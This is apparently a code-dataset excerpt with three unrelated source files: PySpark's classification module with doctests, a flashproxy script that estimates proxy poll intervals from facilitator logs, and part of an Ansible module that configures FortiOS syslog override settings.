"org.apache.spark.ml.classification.GBTClassifier", self.uid)
self._setDefault(maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
lossType="logistic", maxIter=20, stepSize=0.1, subsamplingRate=1.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0,
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10,
lossType="logistic", maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxDepth=5, maxBins=32, minInstancesPerNode=1, minInfoGain=0.0, \
maxMemoryInMB=256, cacheNodeIds=False, checkpointInterval=10, \
lossType="logistic", maxIter=20, stepSize=0.1, seed=None, subsamplingRate=1.0)
Sets params for Gradient Boosted Tree Classification.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return GBTClassificationModel(java_model)
@since("1.4.0")
def setLossType(self, value):
"""
Sets the value of :py:attr:`lossType`.
"""
return self._set(lossType=value)
@since("1.4.0")
def getLossType(self):
"""
Gets the value of lossType or its default value.
"""
return self.getOrDefault(self.lossType)
class GBTClassificationModel(TreeEnsembleModel, JavaPredictionModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by GBTClassifier.
.. versionadded:: 1.4.0
"""
@property
@since("2.0.0")
def featureImportances(self):
"""
Estimate of the importance of each feature.
        Each feature's importance is the average of its importance across all trees in the ensemble.
The importance vector is normalized to sum to 1. This method is suggested by Hastie et al.
(Hastie, Tibshirani, Friedman. "The Elements of Statistical Learning, 2nd Edition." 2001.)
and follows the implementation from scikit-learn.
.. seealso:: :py:attr:`DecisionTreeClassificationModel.featureImportances`
"""
return self._call_java("featureImportances")
@property
@since("2.0.0")
def trees(self):
"""Trees in this ensemble. Warning: These have null parent Estimators."""
return [DecisionTreeRegressionModel(m) for m in list(self._call_java("trees"))]
@inherit_doc
class NaiveBayes(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol, HasProbabilityCol,
HasRawPredictionCol, HasThresholds, HasWeightCol, JavaMLWritable, JavaMLReadable):
"""
Naive Bayes Classifiers.
It supports both Multinomial and Bernoulli NB. `Multinomial NB
<http://nlp.stanford.edu/IR-book/html/htmledition/naive-bayes-text-classification-1.html>`_
can handle finitely supported discrete data. For example, by converting documents into
    TF-IDF vectors, it can be used for document classification. By converting every vector to
    binary (0/1) data, it can also be used as `Bernoulli NB
<http://nlp.stanford.edu/IR-book/html/htmledition/the-bernoulli-model-1.html>`_.
The input feature values must be nonnegative.
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> df = spark.createDataFrame([
... Row(label=0.0, weight=0.1, features=Vectors.dense([0.0, 0.0])),
... Row(label=0.0, weight=0.5, features=Vectors.dense([0.0, 1.0])),
... Row(label=1.0, weight=1.0, features=Vectors.dense([1.0, 0.0]))])
>>> nb = NaiveBayes(smoothing=1.0, modelType="multinomial", weightCol="weight")
>>> model = nb.fit(df)
>>> model.pi
DenseVector([-0.81..., -0.58...])
>>> model.theta
DenseMatrix(2, 2, [-0.91..., -0.51..., -0.40..., -1.09...], 1)
>>> test0 = sc.parallelize([Row(features=Vectors.dense([1.0, 0.0]))]).toDF()
>>> result = model.transform(test0).head()
>>> result.prediction
1.0
>>> result.probability
DenseVector([0.32..., 0.67...])
>>> result.rawPrediction
DenseVector([-1.72..., -0.99...])
>>> test1 = sc.parallelize([Row(features=Vectors.sparse(2, [0], [1.0]))]).toDF()
>>> model.transform(test1).head().prediction
1.0
>>> nb_path = temp_path + "/nb"
>>> nb.save(nb_path)
>>> nb2 = NaiveBayes.load(nb_path)
>>> nb2.getSmoothing()
1.0
>>> model_path = temp_path + "/nb_model"
>>> model.save(model_path)
>>> model2 = NaiveBayesModel.load(model_path)
>>> model.pi == model2.pi
True
>>> model.theta == model2.theta
True
>>> nb = nb.setThresholds([0.01, 10.00])
>>> model3 = nb.fit(df)
>>> result = model3.transform(test0).head()
>>> result.prediction
0.0
.. versionadded:: 1.5.0
"""
smoothing = Param(Params._dummy(), "smoothing", "The smoothing parameter, should be >= 0, " +
"default is 1.0", typeConverter=TypeConverters.toFloat)
modelType = Param(Params._dummy(), "modelType", "The model type which is a string " +
"(case-sensitive). Supported options: multinomial (default) and bernoulli.",
typeConverter=TypeConverters.toString)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0,
modelType="multinomial", thresholds=None, weightCol=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0, \
modelType="multinomial", thresholds=None, weightCol=None)
"""
super(NaiveBayes, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.NaiveBayes", self.uid)
self._setDefault(smoothing=1.0, modelType="multinomial")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.5.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0,
modelType="multinomial", thresholds=None, weightCol=None):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
probabilityCol="probability", rawPredictionCol="rawPrediction", smoothing=1.0, \
modelType="multinomial", thresholds=None, weightCol=None)
Sets params for Naive Bayes.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return NaiveBayesModel(java_model)
@since("1.5.0")
def setSmoothing(self, value):
"""
Sets the value of :py:attr:`smoothing`.
"""
return self._set(smoothing=value)
@since("1.5.0")
def getSmoothing(self):
"""
Gets the value of smoothing or its default value.
"""
return self.getOrDefault(self.smoothing)
@since("1.5.0")
def setModelType(self, value):
"""
Sets the value of :py:attr:`modelType`.
"""
return self._set(modelType=value)
@since("1.5.0")
def getModelType(self):
"""
Gets the value of modelType or its default value.
"""
return self.getOrDefault(self.modelType)
class NaiveBayesModel(JavaModel, JavaClassificationModel, JavaMLWritable, JavaMLReadable):
"""
Model fitted by NaiveBayes.
.. versionadded:: 1.5.0
"""
@property
@since("2.0.0")
def pi(self):
"""
log of class priors.
"""
return self._call_java("pi")
@property
@since("2.0.0")
def theta(self):
"""
log of class conditional probabilities.
"""
return self._call_java("theta")
@inherit_doc
class MultilayerPerceptronClassifier(JavaEstimator, HasFeaturesCol, HasLabelCol, HasPredictionCol,
HasMaxIter, HasTol, HasSeed, HasStepSize, JavaMLWritable,
JavaMLReadable):
"""
Classifier trainer based on the Multilayer Perceptron.
    Each layer has a sigmoid activation function; the output layer has softmax.
    The number of inputs has to be equal to the size of the feature vectors.
    The number of outputs has to be equal to the total number of labels.
>>> from pyspark.ml.linalg import Vectors
>>> df = spark.createDataFrame([
... (0.0, Vectors.dense([0.0, 0.0])),
... (1.0, Vectors.dense([0.0, 1.0])),
... (1.0, Vectors.dense([1.0, 0.0])),
... (0.0, Vectors.dense([1.0, 1.0]))], ["label", "features"])
>>> mlp = MultilayerPerceptronClassifier(maxIter=100, layers=[2, 2, 2], blockSize=1, seed=123)
>>> model = mlp.fit(df)
>>> model.layers
[2, 2, 2]
>>> model.weights.size
12
>>> testDF = spark.createDataFrame([
... (Vectors.dense([1.0, 0.0]),),
... (Vectors.dense([0.0, 0.0]),)], ["features"])
>>> model.transform(testDF).show()
+---------+----------+
| features|prediction|
+---------+----------+
|[1.0,0.0]| 1.0|
|[0.0,0.0]| 0.0|
+---------+----------+
...
>>> mlp_path = temp_path + "/mlp"
>>> mlp.save(mlp_path)
>>> mlp2 = MultilayerPerceptronClassifier.load(mlp_path)
>>> mlp2.getBlockSize()
1
>>> model_path = temp_path + "/mlp_model"
>>> model.save(model_path)
>>> model2 = MultilayerPerceptronClassificationModel.load(model_path)
>>> model.layers == model2.layers
True
>>> model.weights == model2.weights
True
>>> mlp2 = mlp2.setInitialWeights(list(range(0, 12)))
>>> model3 = mlp2.fit(df)
>>> model3.weights != model2.weights
True
>>> model3.layers == model.layers
True
.. versionadded:: 1.6.0
"""
    layers = Param(Params._dummy(), "layers", "Sizes of layers from input layer to output layer. " +
"E.g., Array(780, 100, 10) means 780 inputs, one hidden layer with 100 " +
"neurons and output layer of 10 neurons.",
typeConverter=TypeConverters.toListInt)
blockSize = Param(Params._dummy(), "blockSize", "Block size for stacking input data in " +
"matrices. Data is stacked within partitions. If block size is more than " +
"remaining data in a partition then it is adjusted to the size of this " +
"data. Recommended size is between 10 and 1000, default is 128.",
typeConverter=TypeConverters.toInt)
solver = Param(Params._dummy(), "solver", "The solver algorithm for optimization. Supported " +
"options: l-bfgs, gd.", typeConverter=TypeConverters.toString)
initialWeights = Param(Params._dummy(), "initialWeights", "The initial weights of the model.",
typeConverter=TypeConverters.toVector)
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03,
solver="l-bfgs", initialWeights=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03, \
solver="l-bfgs", initialWeights=None)
"""
super(MultilayerPerceptronClassifier, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.classification.MultilayerPerceptronClassifier", self.uid)
self._setDefault(maxIter=100, tol=1E-4, blockSize=128, stepSize=0.03, solver="l-bfgs")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
@since("1.6.0")
def setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction",
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03,
solver="l-bfgs", initialWeights=None):
"""
setParams(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
maxIter=100, tol=1e-6, seed=None, layers=None, blockSize=128, stepSize=0.03, \
solver="l-bfgs", initialWeights=None)
Sets params for MultilayerPerceptronClassifier.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return MultilayerPerceptronClassificationModel(java_model)
@since("1.6.0")
def setLayers(self, value):
"""
Sets the value of :py:attr:`layers`.
"""
return self._set(layers=value)
@since("1.6.0")
def getLayers(self):
"""
Gets the value of layers or its default value.
"""
return self.getOrDefault(self.layers)
@since("1.6.0")
def setBlockSize(self, value):
"""
Sets the value of :py:attr:`blockSize`.
"""
return self._set(blockSize=value)
@since("1.6.0")
def getBlockSize(self):
"""
Gets the value of blockSize or its default value.
"""
return self.getOrDefault(self.blockSize)
@since("2.0.0")
def setStepSize(self, value):
"""
Sets the value of :py:attr:`stepSize`.
"""
return self._set(stepSize=value)
@since("2.0.0")
def getStepSize(self):
"""
Gets the value of stepSize or its default value.
"""
return self.getOrDefault(self.stepSize)
@since("2.0.0")
def setSolver(self, value):
"""
Sets the value of :py:attr:`solver`.
"""
return self._set(solver=value)
@since("2.0.0")
def getSolver(self):
"""
Gets the value of solver or its default value.
"""
return self.getOrDefault(self.solver)
@since("2.0.0")
def setInitialWeights(self, value):
"""
Sets the value of :py:attr:`initialWeights`.
"""
return self._set(initialWeights=value)
@since("2.0.0")
def getInitialWeights(self):
"""
Gets the value of initialWeights or its default value.
"""
return self.getOrDefault(self.initialWeights)
class MultilayerPerceptronClassificationModel(JavaModel, JavaPredictionModel, JavaMLWritable,
JavaMLReadable):
"""
Model fitted by MultilayerPerceptronClassifier.
.. versionadded:: 1.6.0
"""
@property
@since("1.6.0")
def layers(self):
"""
array of layer sizes including input and output layers.
"""
return self._call_java("javaLayers")
@property
@since("2.0.0")
def weights(self):
"""
the weights of layers.
"""
return self._call_java("weights")
class OneVsRestParams(HasFeaturesCol, HasLabelCol, HasPredictionCol):
"""
Parameters for OneVsRest and OneVsRestModel.
"""
classifier = Param(Params._dummy(), "classifier", "base binary classifier")
@since("2.0.0")
def setClassifier(self, value):
"""
Sets the value of :py:attr:`classifier`.
.. note:: Only LogisticRegression and NaiveBayes are supported now.
"""
return self._set(classifier=value)
@since("2.0.0")
def getClassifier(self):
"""
Gets the value of classifier or its default value.
"""
return self.getOrDefault(self.classifier)
@inherit_doc
class OneVsRest(Estimator, OneVsRestParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Reduction of Multiclass Classification to Binary Classification.
    Performs reduction using the one-against-all strategy.
    For a multiclass classification with k classes, train k models (one per class).
    Each example is scored against all k models, and the model with the highest score
    is picked to label the example.
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> df = sc.parallelize([
... Row(label=0.0, features=Vectors.dense(1.0, 0.8)),
... Row(label=1.0, features=Vectors.sparse(2, [], [])),
... Row(label=2.0, features=Vectors.dense(0.5, 0.5))]).toDF()
>>> lr = LogisticRegression(maxIter=5, regParam=0.01)
>>> ovr = OneVsRest(classifier=lr)
>>> model = ovr.fit(df)
>>> [x.coefficients for x in model.models]
[DenseVector([3.3925, 1.8785]), DenseVector([-4.3016, -6.3163]), DenseVector([-4.5855, 6.1785])]
>>> [x.intercept for x in model.models]
[-3.64747..., 2.55078..., -1.10165...]
>>> test0 = sc.parallelize([Row(features=Vectors.dense(-1.0, 0.0))]).toDF()
>>> model.transform(test0).head().prediction
1.0
>>> test1 = sc.parallelize([Row(features=Vectors.sparse(2, [0], [1.0]))]).toDF()
>>> model.transform(test1).head().prediction
0.0
>>> test2 = sc.parallelize([Row(features=Vectors.dense(0.5, 0.4))]).toDF()
>>> model.transform(test2).head().prediction
2.0
.. versionadded:: 2.0.0
"""
@keyword_only
def __init__(self, featuresCol="features", labelCol="label", predictionCol="prediction",
classifier=None):
"""
__init__(self, featuresCol="features", labelCol="label", predictionCol="prediction", \
classifier=None)
"""
super(OneVsRest, self).__init__()
kwargs = self.__init__._input_kwargs
self._set(**kwargs)
@keyword_only
@since("2.0.0")
def setParams(self, featuresCol=None, labelCol=None, predictionCol=None, classifier=None):
"""
setParams(self, featuresCol=None, labelCol=None, predictionCol=None, classifier=None):
Sets params for OneVsRest.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _fit(self, dataset):
labelCol = self.getLabelCol()
featuresCol = self.getFeaturesCol()
predictionCol = self.getPredictionCol()
classifier = self.getClassifier()
assert isinstance(classifier, HasRawPredictionCol),\
"Classifier %s doesn't extend from HasRawPredictionCol." % type(classifier)
numClasses = int(dataset.agg({labelCol: "max"}).head()["max("+labelCol+")"]) + 1
multiclassLabeled = dataset.select(labelCol, featuresCol)
# persist if underlying dataset is not persistent.
handlePersistence = \
dataset.rdd.getStorageLevel() == StorageLevel(False, False, False, False)
if handlePersistence:
multiclassLabeled.persist(StorageLevel.MEMORY_AND_DISK)
def trainSingleClass(index):
binaryLabelCol = "mc2b$" + str(index)
trainingDataset = multiclassLabeled.withColumn(
binaryLabelCol,
when(multiclassLabeled[labelCol] == float(index), 1.0).otherwise(0.0))
paramMap = dict([(classifier.labelCol, binaryLabelCol),
(classifier.featuresCol, featuresCol),
(classifier.predictionCol, predictionCol)])
return classifier.fit(trainingDataset, paramMap)
# TODO: Parallel training for all classes.
models = [trainSingleClass(i) for i in range(numClasses)]
if handlePersistence:
multiclassLabeled.unpersist()
return self._copyValues(OneVsRestModel(models=models))
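    # Sketch of what trainSingleClass does: for class index k the multiclass label column is
    # mapped to a binary column, e.g. labels [0.0, 1.0, 2.0] with k = 1 become [0.0, 1.0, 0.0],
    # and the base classifier is fit on that column; one binary model is trained per class.
    # (Illustrative values only.)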
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This creates a deep copy of the embedded paramMap,
and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newOvr = Params.copy(self, extra)
if self.isSet(self.classifier):
newOvr.setClassifier(self.getClassifier().copy(extra))
return newOvr
@since("2.0.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@since("2.0.0")
def save(self, path):
"""Save this ML instance to the given path, a shortcut of `write().save(path)`."""
self.write().save(path)
@classmethod
@since("2.0.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java OneVsRest, create and return a Python wrapper of it.
Used for ML persistence.
"""
featuresCol = java_stage.getFeaturesCol()
labelCol = java_stage.getLabelCol()
predictionCol = java_stage.getPredictionCol()
classifier = JavaParams._from_java(java_stage.getClassifier())
py_stage = cls(featuresCol=featuresCol, labelCol=labelCol, predictionCol=predictionCol,
classifier=classifier)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java OneVsRest. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.classification.OneVsRest",
self.uid)
_java_obj.setClassifier(self.getClassifier()._to_java())
_java_obj.setFeaturesCol(self.getFeaturesCol())
_java_obj.setLabelCol(self.getLabelCol())
_java_obj.setPredictionCol(self.getPredictionCol())
return _java_obj
class OneVsRestModel(Model, OneVsRestParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Model fitted by OneVsRest.
This stores the models resulting from training k binary classifiers: one for each class.
Each example is scored against all k models, and the model with the highest score
is picked to label the example.
.. versionadded:: 2.0.0
"""
def __init__(self, models):
super(OneVsRestModel, self).__init__()
self.models = models
def _transform(self, dataset):
# determine the input columns: these need to be passed through
origCols = dataset.columns
# add an accumulator column to store predictions of all the models
accColName = "mbc$acc" + str(uuid.uuid4())
initUDF = udf(lambda _: [], ArrayType(DoubleType()))
newDataset = dataset.withColumn(accColName, initUDF(dataset[origCols[0]]))
# persist if underlying dataset is not persistent.
handlePersistence = \
dataset.rdd.getStorageLevel() == StorageLevel(False, False, False, False)
if handlePersistence:
newDataset.persist(StorageLevel.MEMORY_AND_DISK)
# update the accumulator column with the result of prediction of models
aggregatedDataset = newDataset
for index, model in enumerate(self.models):
rawPredictionCol = model._call_java("getRawPredictionCol")
columns = origCols + [rawPredictionCol, accColName]
# add temporary column to store intermediate scores and update
tmpColName = "mbc$tmp" + str(uuid.uuid4())
updateUDF = udf(
lambda predictions, prediction: predictions + [prediction.tolist()[1]],
ArrayType(DoubleType()))
transformedDataset = model.transform(aggregatedDataset).select(*columns)
updatedDataset = transformedDataset.withColumn(
tmpColName,
updateUDF(transformedDataset[accColName], transformedDataset[rawPredictionCol]))
newColumns = origCols + [tmpColName]
# switch out the intermediate column with the accumulator column
aggregatedDataset = updatedDataset\
.select(*newColumns).withColumnRenamed(tmpColName, accColName)
if handlePersistence:
newDataset.unpersist()
# output the index of the classifier with highest confidence as prediction
labelUDF = udf(
lambda predictions: float(max(enumerate(predictions), key=operator.itemgetter(1))[0]),
DoubleType())
# output label and label metadata as prediction
return aggregatedDataset.withColumn(
self.getPredictionCol(), labelUDF(aggregatedDataset[accColName])).drop(accColName)
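    # Sketch of the transform above: after the loop, the accumulator column holds one
    # positive-class raw score per binary model, e.g. [0.2, 1.3, -0.5]; labelUDF takes the
    # argmax index, so that row's prediction would be 1.0. (Illustrative scores only.)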
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This creates a deep copy of the embedded paramMap,
and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newModel = Params.copy(self, extra)
newModel.models = [model.copy(extra) for model in self.models]
return newModel
@since("2.0.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@since("2.0.0")
def save(self, path):
"""Save this ML instance to the given path, a shortcut of `write().save(path)`."""
self.write().save(path)
@classmethod
@since("2.0.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java OneVsRestModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
featuresCol = java_stage.getFeaturesCol()
labelCol = java_stage.getLabelCol()
predictionCol = java_stage.getPredictionCol()
classifier = JavaParams._from_java(java_stage.getClassifier())
models = [JavaParams._from_java(model) for model in java_stage.models()]
py_stage = cls(models=models).setPredictionCol(predictionCol).setLabelCol(labelCol)\
.setFeaturesCol(featuresCol).setClassifier(classifier)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java OneVsRestModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
java_models = [model._to_java() for model in self.models]
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.classification.OneVsRestModel",
self.uid, java_models)
_java_obj.set("classifier", self.getClassifier()._to_java())
_java_obj.set("featuresCol", self.getFeaturesCol())
_java_obj.set("labelCol", self.getLabelCol())
_java_obj.set("predictionCol", self.getPredictionCol())
return _java_obj
if __name__ == "__main__":
import doctest
import pyspark.ml.classification
from pyspark.sql import SparkSession
globs = pyspark.ml.classification.__dict__.copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.classification tests")\
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
import tempfile
temp_path = tempfile.mkdtemp()
globs['temp_path'] = temp_path
try:
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
finally:
from shutil import rmtree
try:
rmtree(temp_path)
except OSError:
pass
if failure_count:
exit(-1)
| apache-2.0 | 5,156,803,246,546,186,000 | 37.694611 | 100 | 0.61874 | false |
arlolra/flashproxy | experiments/proxy-extract.py | 3 | 2497 | #!/usr/bin/env python
import datetime
import getopt
import re
import sys
def usage(f = sys.stdout):
print >> f, """\
Usage: %s [INPUTFILE]
Extract proxy connections from a facilitator log. Each output line is
date\tcount\n
where count is the approximate poll interval in effect at date.
-h, --help show this help.
""" % sys.argv[0]
opts, args = getopt.gnu_getopt(sys.argv[1:], "h", ["help"])
for o, a in opts:
if o == "-h" or o == "--help":
usage()
sys.exit()
if len(args) == 0:
input_file = sys.stdin
elif len(args) == 1:
input_file = open(args[0])
else:
usage()
sys.exit()
def timedelta_to_seconds(delta):
return delta.days * (24 * 60 * 60) + delta.seconds + delta.microseconds / 1000000.0
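# For example, timedelta_to_seconds(datetime.timedelta(days=1, seconds=30)) returns 86430.0.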
# commit 49de7bf689ee989997a1edbf2414a7bdbc2164f9
# Author: David Fifield <[email protected]>
# Date: Thu Jan 3 21:01:39 2013 -0800
#
# Bump poll interval from 10 s to 60 s.
#
# commit 69d429db12cedc90dac9ccefcace80c86af7eb51
# Author: David Fifield <[email protected]>
# Date: Tue Jan 15 14:02:02 2013 -0800
#
# Increase facilitator_poll_interval from 1 m to 10 m.
BEGIN_60S = datetime.datetime(2013, 1, 3, 21, 0, 0)
BEGIN_600S = datetime.datetime(2013, 1, 15, 14, 0, 0)
# Proxies refresh themselves once a day, so interpolate across a day when the
# polling interval historically changed.
def get_poll_interval(date):
if date < BEGIN_60S:
return 10
elif BEGIN_60S <= date < BEGIN_60S + datetime.timedelta(1):
return timedelta_to_seconds(date-BEGIN_60S) / timedelta_to_seconds(datetime.timedelta(1)) * (60-10) + 10
elif date < BEGIN_600S:
return 60
elif BEGIN_600S <= date < BEGIN_600S + datetime.timedelta(1):
return timedelta_to_seconds(date-BEGIN_600S) / timedelta_to_seconds(datetime.timedelta(1)) * (600-60) + 60
else:
return 600
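# For example, a timestamp 12 hours after BEGIN_60S interpolates to 0.5 * (60 - 10) + 10 = 35
# seconds, and any timestamp later than BEGIN_600S plus one day returns 600.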
prev_output = None
count = 0.0
for line in input_file:
m = re.match(r'^(\d+-\d+-\d+ \d+:\d+:\d+) proxy gets', line)
if not m:
continue
date_str, = m.groups()
date = datetime.datetime.strptime(date_str, "%Y-%m-%d %H:%M:%S")
count += get_poll_interval(date)
rounded_date = date.replace(minute=0, second=0, microsecond=0)
prev_output = prev_output or rounded_date
if prev_output is None or rounded_date != prev_output:
avg = float(count) / 10.0
print date.strftime("%Y-%m-%d %H:%M:%S") + "\t" + "%.2f" % avg
prev_output = rounded_date
count = 0.0
| mit | -4,201,470,982,416,928,000 | 29.45122 | 114 | 0.642371 | false |
h3biomed/ansible | lib/ansible/modules/network/fortios/fortios_log_syslogd_override_setting.py | 23 | 12526 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# The lib uses python logging; you can get its output if the following is set in your
# Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_log_syslogd_override_setting
short_description: Override settings for remote syslog server in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by allowing the
user to set and modify log_syslogd feature and override_setting category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip address.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: true
log_syslogd_override_setting:
description:
- Override settings for remote syslog server.
default: null
suboptions:
certificate:
description:
- Certificate used to communicate with Syslog server. Source certificate.local.name.
custom-field-name:
description:
- Custom field name for CEF format logging.
suboptions:
custom:
description:
- Field custom name.
id:
description:
- Entry ID.
required: true
name:
description:
- Field name.
enc-algorithm:
description:
- Enable/disable reliable syslogging with TLS encryption.
choices:
- high-medium
- high
- low
- disable
facility:
description:
- Remote syslog facility.
choices:
- kernel
- user
- mail
- daemon
- auth
- syslog
- lpr
- news
- uucp
- cron
- authpriv
- ftp
- ntp
- audit
- alert
- clock
- local0
- local1
- local2
- local3
- local4
- local5
- local6
- local7
format:
description:
- Log format.
choices:
- default
- csv
- cef
mode:
description:
- Remote syslog logging over UDP/Reliable TCP.
choices:
- udp
- legacy-reliable
- reliable
override:
description:
- Enable/disable override syslog settings.
choices:
- enable
- disable
port:
description:
- Server listen port.
server:
description:
- Address of remote syslog server.
source-ip:
description:
- Source IP address of syslog.
status:
description:
- Enable/disable remote syslog logging.
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Override settings for remote syslog server.
fortios_log_syslogd_override_setting:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
log_syslogd_override_setting:
certificate: "<your_own_value> (source certificate.local.name)"
custom-field-name:
-
custom: "<your_own_value>"
id: "6"
name: "default_name_7"
enc-algorithm: "high-medium"
facility: "kernel"
format: "default"
mode: "udp"
override: "enable"
port: "13"
server: "192.168.100.40"
source-ip: "84.230.14.43"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_log_syslogd_override_setting_data(json):
option_list = ['certificate', 'custom-field-name', 'enc-algorithm',
'facility', 'format', 'mode',
'override', 'port', 'server',
'source-ip', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def flatten_multilists_attributes(data):
multilist_attrs = []
for attr in multilist_attrs:
try:
path = "data['" + "']['".join(elem for elem in attr) + "']"
current_val = eval(path)
flattened_val = ' '.join(elem for elem in current_val)
exec(path + '= flattened_val')
except BaseException:
pass
return data
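# Note: multilist_attrs is empty above, so this function is currently a no-op for this module.
# With a hypothetical entry [['members']] and data['members'] == ['a', 'b'], the value would be
# flattened to the single string 'a b'.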
def log_syslogd_override_setting(data, fos):
vdom = data['vdom']
log_syslogd_override_setting_data = data['log_syslogd_override_setting']
